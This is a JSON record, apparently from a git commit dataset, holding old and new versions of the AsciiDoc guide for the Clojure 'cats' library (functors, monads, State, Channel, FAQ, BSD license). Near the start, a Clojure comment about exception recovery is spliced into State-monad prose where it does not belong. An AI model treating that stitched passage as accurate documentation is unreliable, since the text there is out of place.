1 nil)\n (fn [e]\n (cond\n (instance? NullPointerException e) 0\n :else 100)))\n;; => #<Success [0]>\n----\n\n\n=== State\n\nState monad in one of the special cases of monads most used in Haskell. It has different\npurposes including: lazy computation, composition, and maintaining state without explicit state.\n\nThe de-facto monadic type of the state monad is a plain function. Function represents a computation\nas is (without executing it). Obviously, a function should have some special characteristics to work\nin monad state composition.\n\n.Valid function for valid state monad\n[source, clojure]\n----\n(fn [state]\n \"Takes state as argument and return a vector\n with first argument with procesed value and\n second argument the transformed new state.\"\n (let [newvalue (first state)\n newstate (next state)]\n [newvalue newstate]))\n----\n\nYou just saw an example of the low-level primitive state monad. 
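;; The recovery function receives the thrown exception as its argument,\n;; so the handler below can branch on the exception type:\n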
For basic usage\nyou do not need to build your own functions, just use some helpers that _cats_ provides.\n\nLet's look at one example before explaining the details:\n\n.Lazy composition of computations\n[source, clojure]\n----\n(m\/mlet [state (m\/get-state)\n _ (m\/put-state (next state))]\n (return (first state)))\n;;=> #<State cats.monad.state.State@2eebabb6>\n----\n\nAt the moment of evaluation in the previous expression, anything that we have defined\nis executed. But instead of returning the unadorned final value of the computation,\na strange\/unknown object is returned of type *State*.\n\nState is simply a wrapper for Clojure functions, nothing more.\n\nNow, it's time to execute the composed computation. For this we can use one of the following\nfunctions exposed by _cats_: `run-state`, `eval-state` and `exec-state`.\n\n- `run-state` function executes the composed computation and returns both the value and the\n result state.\n- `eval-state` function executes the composed computation and returns the resulting value\n discarding the state.\n- `exec-state` function executes the composed computation and return only the resulting\n state, ignoring the resulting value.\n\n.This is what happens when we execute these three functions over previously generated `State` instance\n[source, clojure]\n----\n(m\/run-state s [1 2 3])\n;;=> #<Pair [1 (2 3)]>\n(m\/eval-state s [1 2 3])\n;;=> 1\n(m\/exec-state s [1 2 3])\n;;=> (2 3)\n----\n\nNOTE: the pair instance returned by `run-state` function works like any other seq in Clojure, with\nthe difference that pairs can only have two slots.\n\nThis is a very basic example of the state monad, it has a lot of use cases and explaining all them\nseems out of the scope of this document.\n\nHowever, if you have better examples to explain the state monad, documentation for another monad or\nany other contribution is always welcome.\n\n\n=== Channel\n\nIn asynchronous environments with clojure and clojurescript we tend to use core.async, because it\nis a very powerfull abstraction.\n\nIt would be awesome to be able to work with channel as a monadic type, and combine it with error\nmonads for short-circuiting async computations that may fail.\n\nLet's start using channel as a functor:\n[source, clojure]\n----\n(require '[cljs.core.async :refer [chan put! <!!]])\n(require '[cats.monad.channel :as channel])\n\n;; Declare arbitrary channel with initial value\n(def mychan (channel\/with-value 2))\n\n;; Use channel as a functor\n(<!! (m\/fmap inc mychan))\n;; => 3\n----\n\nThe channel type also fulfills the monad abstraction, let see it in action:\n\n[source, clojure]\n----\n(def result (m\/mlet [a (channel\/with-value 2)\n b (channel\/with-value 3)]\n (m\/return (+ a b))))\n(<!! result)\n;; => 5\n----\n\nBut the best of all is coming: combine the channel monad with error monads. It allows to build very concise\nand simple asynchronous APIs. Let see how you can use it your application:\n\n[source, clojure]\n----\n(require '[cats.monad.either :as either])\n\n;; Declare a monad transformer\n(def either-chan-m\n (either\/either-transformer channel\/channel-monad))\n\n;; A success example\n(<!! 
(m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/right 2))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Right [5]>\n----\n\nAs you can see, the code looks very similar to the previos example, with the exception that\nthe value in a channel is not a simple plain value, is an either instance.\n\nLet's see what happens if some computation fails in the mlet composition:\n\n[source, clojure]\n----\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/left \"Some error\"))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Left [Some error]>\n----\n\nThe result is the expected short-circuiting left, without unexpected nullpointer exceptions\nor similar issues.\n\nWith this compositional power, you can model your asynchronous API with a complete\nerror handling using any error monad (in this case Either).\n\n\n=== Reader\n\nTODO\n\n\n=== Writer\n\nTODO\n\n\n=== Continuation\n\nTODO\n\n\n=== Vector\n\nTODO\n\n\n== FAQ\n\n=== What are the difference with other existing libraries?\n\nThis is an incomplete list of differences with other existing libraries:\n\n- The official monads library `algo.monads` is very good, but its approach for modeling\n is slighty limited (e.g. you always need to specify what monad you want use instead of\n relying on the type). And obviously because it only has monads.\n- Fluokitten is the best library that we found, but the future of it is uncertain. One big\n difference with fluokitten is that `cats` doesn't aim to extend every Clojure type\n with monadic protocols, for the obvious reason that monad; functor and applicative represents\n context\/wrapper types and it doesn't make sense to implement Functor protocol for `java.lang.String`.\n- `bwo\/monads` is the last monads library. It is completely undocumented and its implementation\n has much unnecesary complexity.\n\n\n=== What Clojure types implements some of the Category Theory abstractions?\n\nIn contrast to other similar libraries in Clojure, _cats_ doesn't intend to extend Clojure types\nthat don't act like containers. For example, Clojure keywords are values but can not be containers so\nthey should not extend any of the previously explained protocols.\n\n\n.Summary of Clojure types and implemented protocols\n[options=\"header\"]\n|=============================================================\n| Name | Implemented protocols\n| vector | Functor, Applicative, Monad, MonadZero, MonadPlus\n| hash-set | Functor, Applicative, Monad, MonadZero, MonadPlus\n| list | Functor, Applicative, Monad, MonadZero, MonadPlus\n|=============================================================\n\n\n== How to Contribute?\n\n=== Philosophy\n\nFive most important rules:\n\n- Beautiful is better than ugly.\n- Explicit is better than implicit.\n- Simple is better than complex.\n- Complex is better than complicated.\n- Readability counts.\n\nAll contributions to _cats_ should keep these important rules in mind.\n\n\n=== Procedure\n\n_cats_ does not have many restrictions for contributions. 
Just follow these\nsteps depending on the situation:\n\n*Bugfix*:\n\n- Fork the GitHub repo.\n- Fix a bug\/typo on a new branch.\n- Make a pull-request to master.\n\n*New feature*:\n\n- Open new issue with the new feature proposal.\n- If it is accepted, follow the same steps as \"bugfix\".\n\n\n=== License\n\n[source,text]\n----\nCopyright (c) 2014-2015 Andrey Antukh <niwi@niwi.be>\nCopyright (c) 2014-2015 Alejandro G\u00f3mez\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and\/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n----\n","old_contents":"= Cats Documentation\nAndrey Antukh & Alejandro G\u00f3mez\n0.4.0-SNAPSHOT\n:toc: left\n:numbered:\n:source-highlighter: pygments\n:pygments-style: friendly\n\nimage:logo.png[cats logo]\n\n== Introduction\n\nCategory Theory abstractions for Clojure.\n\n=== Why another library?\n\nBecause the cats library:\n\n- targets both of the most-used Clojure implementations: *Clojure (jvm)* and *ClojureScript(js)*\n- aims to have the simplest implementation of the supported abstractions.\n- aims to have more abstractions that are simple monads.\n- has documentation as first class citizen.\n- licensed under a permissive license (compared to other libraries): BSD (2-Clause)\n\n\n== Project Maturity\n\nSince _cats_ is a young project, there can be some link:api\/index.html#id[API] breakage.\n\n\n== Install\n\nThis section covers installing _cats_.\n\n\n=== Leiningen\n\nThe simplest way to use _cats_ in a Clojure project is by including\nit as a dependency in your *_project.clj_*:\n\n[source,clojure]\n----\n[cats \"0.4.0-SNAPSHOT\"]\n----\n\n\n=== Maven\n\nAlso, you can use it with Maven. 
First, add the Clojars repository:\n\n[source,xml]\n----\n<repository>\n <id>clojars.org<\/id>\n <url>http:\/\/clojars.org\/repo<\/url>\n<\/repository>\n----\n\nThen for cats:\n\n[source,xml]\n----\n<dependency>\n <groupId>cats<\/groupId>\n <artifactId>cats<\/artifactId>\n <version>0.4.0-SNAPSHOT<\/version>\n<\/dependency>\n----\n\n\n=== Get the Code\n\n_cats_ is open source and can be found on link:https:\/\/github.com\/funcool\/cats[github].\n\nYou can clone the public repository with this command:\n\n[source,text]\n----\ngit clone https:\/\/github.com\/funcool\/cats\n----\n\n\n== User Guide\n\nThis section introduces almost all the category theory abstractions that the _cats_ library\nsupports.\n\nWe will use the _Maybe_ for the example snippets, because it has support for all\nthe abstractions and it is very easy to understand. You can read more about it in the next\nsection of the documentation.\n\n\n=== Functor\n\nLet's start with the functor. The Functor represents some sort of \"computational context\", and the\nabstraction consists of one unique function: *fmap*.\n\n.Signature of *fmap* function\n[source, Clojure]\n----\n(fmap [f fv])\n----\n\nThe higher-order function *fmap* takes a plain function as the first parameter and\nvalue wrapped in a functor context as the second parameter. It extracts the inner value\napplies the function to it, and returns the result wrapped in same type as the second\nparameter.\n\nBut, what is the *functor context*? It sounds more complex than it is. A Functor\nwrapper is any type that acts as \"Box\" and implements the `Context` and `Functor` protocols.\n\n.One good example of a functor is the *Maybe* type:\n[source, Clojure]\n----\n(require '[cats.monad.maybe :as maybe])\n\n;; `just` function is one of two constructors of Maybe\n\n(maybe\/just 2)\n;; => #<Just [2]>\n----\n\nLet's see one example using *fmap* over *just* instance:\n\n.Example using fmap over *just*.\n[source, Clojure]\n----\n(require '[cats.core :as m]\n '[cats.monad.maybe :refer [just]])\n\n(m\/fmap inc (just 1))\n;; => #<Just [2]>\n----\n\nWe mentioned above that *fmap* extracts the value from the functor context. You will also want to\nextract values wrapped by *just* and you can do that with *from-maybe*.\n\n.Example using *from-maybe* to extract values wrapped by *just*.\n[source, Clojure]\n----\n(require '[cats.monad.maybe :refer [just from-maybe]])\n\n(from-maybe (just 1))\n;; => 1\n(from-maybe (nothing))\n;; => nil\n(from-maybe (nothing) 42)\n;; => 42\n----\n\nThe *Maybe* type also has another constructor: `nothing`. It represents the absence of a value.\nIt is a safe substitute for `nil` and may represent failure.\n\nLet's see what happens if we perform the same operation as the previous example over a *nothing*\ninstance:\n\n.Example using fmap over *nothing*.\n[source, Clojure]\n----\n(fmap inc (nothing))\n;; => #<Nothing >\n----\n\nOh, awesome, instead of raising a `NullPointerException`, it just returns *nothing*. 
Another\nadvantage of using the functor abstraction, is that it always returns a result\nof the same type as its second argument.\n\nLet's see an example of applying fmap over a Clojure vector:\n\n.Example using fmav over *vector*.\n[source, Clojure]\n----\n(fmap inc [1 2 3])\n;; => [2 3 4]\n----\n\nThe main difference compared to the previous example with Clojure's map function, is that\nmap returns lazy seqs no matter what collection we pass to it:\n\n[source, Clojure]\n----\n(type (map inc [1 2 3]))\n;; => clojure.lang.LazySeq (cljs.core\/LazySeq in ClojureScript)\n----\n\nBut why can we pass vectors to fmap? Because some Clojure container types like vectors,\nlists and sets also implement the functor abstraction.\n\n\n=== Applicative\n\nLet's continue with applicative functors. The Applicative Functor represents\nsome sort of \"computational context\" like a plain Functor, but with ability to\nexecute a function wrapped in the same context.\n\nThe Applicative Functor abstraction consists of two functions: *fapply* and\n*pure*.\n\n.Signature of *fapply* function\n[source, Clojure]\n----\n(fapply [af av])\n----\n\nNOTE: the *pure* function will be explained later.\n\nThe use case for Applicative Functors is much the same as plain Functors: safe\nevaluation of some computation in a context.\n\nLet's see an example to better understand the differences between functor and\napplicative functor:\n\nImagine you have some factory function that, depending on the language, returns a\ngreeter function, and you only support a few languages.\n\n\n[source, Clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (fn [name] (str \"Hola \" name))\n \"en\" (fn [name] (str \"Hello \" name))\n nil))\n----\n\nNow, before using the resulting greeter you should always defensively check if returned\ngreeter is a valid function or is a nil value.\n\nLet's convert this factory to use Maybe type:\n\n[source, Clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (just (fn [name] (str \"Hola \" name)))\n \"en\" (just (fn [name] (str \"Hello \" name)))\n (nothing)))\n----\n\nAs you can see, this version of the factory differs only slightly from the\noriginal implementation. And this tiny change gives you a new superpower: you\ncan apply the returned greeter to any value without a defensive nil check:\n\n[source, Clojure]\n----\n(fapply (make-greeter \"es\") (just \"Alex\"))\n;; => #<Just [Hola Alex]>\n\n(fapply (make-greeter \"en\") (just \"Alex\"))\n;; => #<Just [Hello Alex]>\n\n(fapply (make-greeter \"it\") (just \"Alex\"))\n;; => #<Nothing >\n----\n\nMoreover, the applicative functor comes with *pure* function, and the main purpose of this function is\nto put some value in side-effect-free context of the current type.\n\nExamples:\n\n[source, Clojure]\n----\n(require '[cats.monad.maybe])\n(require '[cats.monad.either])\n\n(pure maybe\/maybe-monad 5)\n;; => #<Just [5]>\n\n(pure either\/either-monad :bar)\n;; => #<Either [:bar :right]>\n----\n\nIf you do not understand the purpose of the *pure* function, the next section\nshould clarify its purpose.\n\n\n=== Monad\n\nMonads are the most discussed programming concept to come from category theory. 
Like functors and\napplicatives, monads deal with data in contexts.\n\nAdditionaly, monads can also transform contexts by unwrapping data, applying functions to it and\nputting new values in a completely different context.\n\nThe monad abstraction consists of two functions: *bind* and *return*\n\n.Bind function signature.\n[source,Clojure]\n----\n(bind [mv f])\n----\n\nAs you can see, bind works much like a Functor but with inverted arguments. The main difference is\nthat in a monad, the function is a responsible for wrapping a returned value in a context.\n\n.Example usage of the bind higher-order function.\n[source,Clojure]\n----\n(bind (just 1)\n (fn [v] (just (inc v))))\n----\n\nOne of the key features of the bind function is that any computation executed within the context of\nbind (monad) knows the context type implicitly. With this, if you apply some computation over some\nmonadic value and you want to return the result in the same container context but don't know\nwhat that container is, you can use `return` or `pure` functions:\n\n.Usage of return function in bind context.\n[source,Clojure]\n----\n(bind (just 1)\n (fn [v]\n (return (inc v))))\n;; => #<Just [2]>\n----\n\nThe `return` or `pure` functions, when called with one argument, try to use the dynamic scope context\nvalue that's set internally by the `bind` function. Therefore, you can't use them with one argument outside of a `bind` context.\n\nWe now can compose any number of computations using monad *bind*\nfunctions. But observe what happens when the number of computations increases:\n\n.Composability example of bind function.\n[source, Clojure]\n----\n(bind (just 1)\n (fn [a]\n (bind (just (inc a))\n (fn [b]\n (return (* b 2))))))\n----\n\nThis can quickly lead to callback hell. To solve this, _cats_ comes with a powerful\nmacro: *mlet*\n\n.Previous example but using *mlet* macro.\n[source, Clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))]\n (return (* b 2)))\n----\n\nNOTE: If you are coming from Haskell, mlet represents the *do-syntax*.\n\n\nIf you want to use regular (non-monadic) let bindings inside an `mlet` block, you can do so using\n`:let` and a binding vector inside the mlet bindings:\n\n[source, Clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))\n :let [z (+ a b)]]\n (return (* z 2)))\n----\n\n\n=== Monad Transformers\n\n==== Motivation\n\nWe can combine two functors and get a new one automatically. Given any two functors _a_ and _b_,\nwe can implement a generic `fmap` for the type _a (b Any)_, we'll call it fmap2:\n\n[source, Clojure]\n----\n(ns functor.example\n (:require [cats.core :refer [fmap]]\n [cats.monad.maybe :refer [just]])\n (:use [cats.builtin]))\n\n(defn fmap2\n [f fv]\n (fmap (partial fmap f) fv))\n\n; Here, 'a' is [] and 'b' is Maybe, so the type of the\n; combined functor is a vector of Maybe values that could\n; contain a value of any type.\n(fmap2 inc [(maybe\/just 1) (maybe\/just 2)])\n;;=> [#<Just [2]> #<Just [3]>]\n----\n\nHowever, monads don't compose as nicely as functors do. We have to actually implement\nthe composition ourselves.\n\nIn some circumstances we would like combine the effects of two monads into another one. We call the\nresulting monad a monad transformer, which is the composition of a \"base\" and a \"inner\" monad. A\nmonad transformer is itself a monad.\n\n\n==== Using monad transformers\n\nLet's combine the effects of two monads: State and Maybe. 
We'll create the transformer\nusing State as the base monad since we want the resulting type to be a stateful computation\nthat may fail: `s -> Maybe (a, s)`.\n\nAlmost every monad implemented in _cats_ has a monad transformer for combining it with\nany other monad. The transformer functions take a Monad as their argument and they\nreturn a reified MonadTrans:\n\n[source, Clojure]\n----\n(ns transformers.example\n (:require [cats.core :as m]\n [cats.data :as data]\n [cats.monad.maybe :as maybe]\n [cats.monad.state :as state]))\n\n(def maybe-state (state\/state-transformer maybe\/maybe-monad))\n\n(m\/with-monad maybe-state\n (state\/run-state (m\/return 42) {}))\n\n;;=> #<Just [#<Pair [42 {}]>]>\n----\n\nAs we can see in the example below, the return of the `maybe-state` monad creates a stateful\nfunction that yields a Maybe containing a pair (value, next state).\n\nYou probably noticed that we had to wrap the state function invocation with `cats.core\/with-monad`.\nWhen working with monad transformers, we have to be explicit about what monad we are using to implement\nthe binding policy since there is no way to distinguish values from a transformer type from those of\na regular monad.\n\nThe `maybe-state` monad combines the semantics of both State and Maybe.\n\nLet's see it in action:\n\n[source, Clojure]\n----\n(defn any-char [s]\n \"A function that takes an input string as an state and\n consumes one character yielding it as a the value. The\n new state is the input string with the character consumed.\n\n It fails when there isn't a character to consume.\"\n (if (Clojure.string\/blank? s)\n (maybe\/nothing)\n (maybe\/just (data\/pair (first s)\n (.substring s 1)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-char \"Foo\"))\n;;=> #<Just [#<Pair [F oo]>]>\n\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet\n [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"Foo\"))\n;;=> #<Just [#<Pair [Fo o]>]>\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"F\"))\n;;=> #<Nothing >\n\n; We could have written `any-two-chars` more succinctly by using `cats.core\/with-monad`,\n; which is intended as syntactic sugar for transformer usage.\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n; We also define a function for applying parser to a given input\n(defn parse [parser input]\n (m\/with-monad maybe-state\n (let [parse-result (state\/run-state parser input)]\n (maybe\/from-maybe parse-result))))\n----\n\n== Monad types\n\nIn our examples we have seen two types that implement\nthe monad abstraction: Maybe and Either. But these are only two of the types\nthat implements the Monad abstraction. In this section, we will explain the different\nmonad types supported by _cats_ library.\n\n=== Maybe\n\nThis is one of the two most used monad types (also named Optional in other programming\nlanguages).\n\nMaybe\/Optional is a polymorphic type that represents encapsulation of an optional value; e.g. it is\nused as the return type of functions which may or may not return a meaningful value when they\nare applied. 
It consists of either an empty constructor (called None or Nothing), or a constructor\nencapsulating the original data type A (written Just A or Some A).\n\n_cats_, implements two constructors:\n\n- `(just v)`: represents just a value in a context.\n- `(nothing)`: represents a failure or null.\n\n.Usage example of *Maybe* constructors.\n[source, Clojure]\n----\n(require '[cats.monad.maybe :refer :all])\n(just 1)\n;; => #<Just [1]>\n(nothing)\n;; => #<Nothing >\n----\n\n\n=== Either\n\nEither is another type that represents a result of computation, but (in contrast with maybe)\nit can return some data with a failed computation result.\n\nIn _cats_ it has two constructors:\n\n- `(left v)`: represents a failure.\n- `(right v)`: represents a successful result.\n\n.Usage example of *Either* constructors.\n[source, Clojure]\n----\n(require '[cats.monad.either :refer :all])\n\n(right :valid-value)\n;; => #<Right [:valid-value :right]>\n\n(left \"Error message\")\n;; => #<Either [Error message :left]>\n----\n\nNOTE: Either is also (like Maybe) Functor, Applicative Functor and Monad.\n\n\n=== Try\n\nAlso called Exception.\n\nThe `Try` type represents a computation that may either result in an exception\nor return a successfully computed value. It's similar to, but semantically\ndifferent from, the `Either` type.\n\nIt is an analogue of the try-catch block: it replaces try-catch's stack-based error\nhandling with heap-based error handling. Instead of having an exception thrown and\nhaving to deal with it immediately in the same thread, it disconnects the error\nhandling and recovery.\n\n.Usage example of *try-on* macro.\n[source, Clojure]\n----\n(require '[cats.monad.exception :as exc])\n\n(exc\/try-on 1)\n;; => #<Success [1]>\n\n(exc\/try-on (+ 1 nil))\n;; => #<Failure [#<NullPointerException java.lang.NullPointerException>]>\n----\n\n_cats_ comes with other syntactic sugar macros: `try-or-else` that\nreturns a default value if a computation fails, and `try-or-recover` that lets\nyou handle the return value when executing a function with the exception as\nfirst parameter.\n\n\n.Usage example of `try-or-else` macro.\n[source, Clojure]\n----\n(exc\/try-or-else (+ 1 nil) 2)\n;; => #<Success [2]>\n----\n\n.Usage example of `try-or-recover` macro.\n[source, Clojure]\n----\n(exc\/try-or-recover (+ 1 nil)\n (fn [e]\n (cond\n (instance? NullPointerException e) 0\n :else 100)))\n;; => #<Success [0]>\n----\n\n\n=== State\n\nState monad in one of the special cases of monads most used in Haskell. It has different\npurposes including: lazy computation, composition, and maintaining state without explicit state.\n\nThe de-facto monadic type of the state monad is a plain function. Function represents a computation\nas is (without executing it). Obviously, a function should have some special characteristics to work\nin monad state composition.\n\n.Valid function for valid state monad\n[source, Clojure]\n----\n(fn [state]\n \"Takes state as argument and return a vector\n with first argument with procesed value and\n second argument the transformed new state.\"\n (let [newvalue (first state)\n newstate (next state)]\n [newvalue newstate]))\n----\n\nYou just saw an example of the low-level primitive state monad. 
For basic usage\nyou do not need to build your own functions, just use some helpers that _cats_ provides.\n\nLet's look at one example before explaining the details:\n\n.Lazy composition of computations\n[source, Clojure]\n----\n(m\/mlet [state (m\/get-state)\n _ (m\/put-state (next state))]\n (return (first state)))\n;;=> #<State cats.monad.state.State@2eebabb6>\n----\n\nAt the moment of evaluation in the previous expression, anything that we have defined\nis executed. But instead of returning the unadorned final value of the computation,\na strange\/unknown object is returned of type *State*.\n\nState is simply a wrapper for Clojure functions, nothing more.\n\nNow, it's time to execute the composed computation. For this we can use one of the following\nfunctions exposed by _cats_: `run-state`, `eval-state` and `exec-state`.\n\n- `run-state` function executes the composed computation and returns both the value and the\n result state.\n- `eval-state` function executes the composed computation and returns the resulting value\n discarding the state.\n- `exec-state` function executes the composed computation and return only the resulting\n state, ignoring the resulting value.\n\n.This is what happens when we execute these three functions over previously generated `State` instance\n[source, Clojure]\n----\n(m\/run-state s [1 2 3])\n;;=> #<Pair [1 (2 3)]>\n(m\/eval-state s [1 2 3])\n;;=> 1\n(m\/exec-state s [1 2 3])\n;;=> (2 3)\n----\n\nNOTE: the pair instance returned by `run-state` function works like any other seq in Clojure, with\nthe difference that pairs can only have two slots.\n\nThis is a very basic example of the state monad, it has a lot of use cases and explaining all them\nseems out of the scope of this document.\n\nHowever, if you have better examples to explain the state monad, documentation for another monad or\nany other contribution is always welcome.\n\n\n=== Channel\n\nIn asynchronous environments with clojure and clojurescript we tend to use core.async, because it\nis a very powerfull abstraction.\n\nIt would be awesome to be able to work with channel as a monadic type, and combine it with error\nmonads for short-circuiting async computations that may fail.\n\nLet's start using channel as a functor:\n[source, clojure]\n----\n(require '[cljs.core.async :refer [chan put! <!!]])\n(require '[cats.monad.channel :as channel])\n\n;; Declare arbitrary channel with initial value\n(def mychan (channel\/with-value 2))\n\n;; Use channel as a functor\n(<!! (m\/fmap inc mychan))\n;; => 3\n----\n\nThe channel type also fulfills the monad abstraction, let see it in action:\n\n[source, clojure]\n----\n(def result (m\/mlet [a (channel\/with-value 2)\n b (channel\/with-value 3)]\n (m\/return (+ a b))))\n(<!! result)\n;; => 5\n----\n\nBut the best of all is coming: combine the channel monad with error monads. It allows to build very concise\nand simple asynchronous APIs. Let see how you can use it your application:\n\n[source, clojure]\n----\n(require '[cats.monad.either :as either])\n\n;; Declare a monad transformer\n(def either-chan-m\n (either\/either-transformer channel\/channel-monad))\n\n;; A success example\n(<!! 
(m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/right 2))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Right [5]>\n----\n\nAs you can see, the code looks very similar to the previos example, with the exception that\nthe value in a channel is not a simple plain value, is an either instance.\n\nLet's see what happens if some computation fails in the mlet composition:\n\n[source, clojure]\n----\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/left \"Some error\"))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Left [Some error]>\n----\n\nThe result is the expected short-circuiting left, without unexpected nullpointer exceptions\nor similar issues.\n\nWith this compositional power, you can model your asynchronous API with a complete\nerror handling using any error monad (in this case Either).\n\n\n=== Reader\n\nTODO\n\n\n=== Writer\n\nTODO\n\n\n=== Continuation\n\nTODO\n\n\n=== Vector\n\nTODO\n\n\n== FAQ\n\n=== What are the difference with other existing libraries?\n\nThis is an incomplete list of differences with other existing libraries:\n\n- The official monads library `algo.monads` is very good, but its approach for modeling\n is slighty limited (e.g. you always need to specify what monad you want use instead of\n relying on the type). And obviously because it only has monads.\n- Fluokitten is the best library that we found, but the future of it is uncertain. One big\n difference with fluokitten is that `cats` doesn't aim to extend every Clojure type\n with monadic protocols, for the obvious reason that monad; functor and applicative represents\n context\/wrapper types and it doesn't make sense to implement Functor protocol for `java.lang.String`.\n- `bwo\/monads` is the last monads library. It is completely undocumented and its implementation\n has much unnecesary complexity.\n\n\n=== What Clojure types implements some of the Category Theory abstractions?\n\nIn contrast to other similar libraries in Clojure, _cats_ doesn't intend to extend Clojure types\nthat don't act like containers. For example, Clojure keywords are values but can not be containers so\nthey should not extend any of the previously explained protocols.\n\n\n.Summary of Clojure types and implemented protocols\n[options=\"header\"]\n|=============================================================\n| Name | Implemented protocols\n| vector | Functor, Applicative, Monad, MonadZero, MonadPlus\n| hash-set | Functor, Applicative, Monad, MonadZero, MonadPlus\n| list | Functor, Applicative, Monad, MonadZero, MonadPlus\n|=============================================================\n\n\n== How to Contribute?\n\n=== Philosophy\n\nFive most important rules:\n\n- Beautiful is better than ugly.\n- Explicit is better than implicit.\n- Simple is better than complex.\n- Complex is better than complicated.\n- Readability counts.\n\nAll contributions to _cats_ should keep these important rules in mind.\n\n\n=== Procedure\n\n_cats_ does not have many restrictions for contributions. 
Just follow these\nsteps depending on the situation:\n\n*Bugfix*:\n\n- Fork the GitHub repo.\n- Fix a bug\/typo on a new branch.\n- Make a pull-request to master.\n\n*New feature*:\n\n- Open new issue with the new feature proposal.\n- If it is accepted, follow the same steps as \"bugfix\".\n\n\n=== License\n\n[source,text]\n----\nCopyright (c) 2014-2015 Andrey Antukh <niwi@niwi.be>\nCopyright (c) 2014-2015 Alejandro G\u00f3mez\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and\/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n----\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9f1f0012a9b5137abfdceeb2401e30af558f7561","subject":"Update 2015-02-25-Tervetuloa.adoc","message":"Update 2015-02-25-Tervetuloa.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-02-25-Tervetuloa.adoc","new_file":"_posts\/2015-02-25-Tervetuloa.adoc","new_contents":"= Tervetuloa !\n\n:hp-tags: Pr\u00e9sentation, Introduction, Finlande, Laurea\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/helsinki-background.jpg\n\n\nNous sommes cinq \u00e9tudiants d'Epitech - \u00e9cole d'expertise informatique fran\u00e7aise - et nous passerons notre quatri\u00e8me ann\u00e9e (2015\/2016) en Finlande ! Plus pr\u00e9cis\u00e9ment, nous avons \u00e9t\u00e9 accept\u00e9 \u00e0 l'universit\u00e9 de Laurea, \u00e0 Espoo, pr\u00e8s d'Helsinki. 
